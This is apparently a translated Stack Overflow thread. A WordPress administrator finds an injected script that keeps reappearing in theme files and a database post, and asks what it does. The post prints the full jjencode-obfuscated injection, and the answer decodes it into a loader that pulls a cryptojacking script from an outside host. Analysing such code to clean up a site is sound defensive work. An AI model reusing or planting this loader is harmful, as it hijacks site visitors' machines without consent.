Question

我是一家新雇用的IT人员，在一家拥有约100个域名的小公司工作。我只是将所有域名从一个主机移动到另一个主机。

我注意到我们的某个域名在旧服务器上感染了恶意软件，因此我将其删除并将dom移至新服务器。

经过一周的检查后，坏<script>重新出现在新服务器上，因此我知道感染来自WordPress文件（不是受感染的服务器）。当然，所有登录pws都已更改。

这个脚本被注入三个文件（主题的header.php，footer.php，index.php）和一个数据库条目（默认的WP“hello-world”帖子）：

<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$_+(![]+"")[$._$_]+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"('\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"');"+$.$$$_+(![]+"")[$._$_]+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$._$$+"://\\"+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+"."+$.$$__+(![]+"")[$._$_]+$._$+$.$$_$+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.$$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"/\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$__+$.$$$+(![]+"")[$._$_]+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$.$__+$.$$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$_+$.__$+$.$_$+$.$$_$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$._$_+$.$__+$.$___+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+$.___+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$._$$+$.__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+$._$_+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.__$+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$._$$+"_\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.___+$.$$__+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$$_+$.__$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$_$+$.$$_$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$$_+$.$$__+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.$__+$.$_$_+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$_$+$.$_$+$.$__+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+$.$$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$.$$$+$.$_$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"?"+$.__+"\\"+$.__$+$.$$_+$._$_+(![]+"")[$._$_]+"="+$.___+"."+$._$$+$.___+"';"+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.$$$_+(![]+"")[$._$_]+");"+"\"")())();</script>

Link to beautified pastebin.

我的主要问题是，该代码有什么作用？任何人都可以运行它并告诉我它产生了什么吗？

此外，这是感染最终结果的屏幕截图。打电话给一些加密货币矿工（我想）。

谢谢，SO。我已经在这个问题上花了太多时间。

Answer 1

这是一个 jjencode 混淆的脚本，将脚本附加到页面顶部。

这是非混淆代码：

((function $anonymous$(){return"var el = document.createElement('script');el.src='https://web.clod.pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.30';document.head.appendChild(el);"}))

该脚本调用称为 Minr 的Cryptojacking脚本。

网站感染了重新出现的JS恶意软件。这段代码有什么作用？

1 个答案: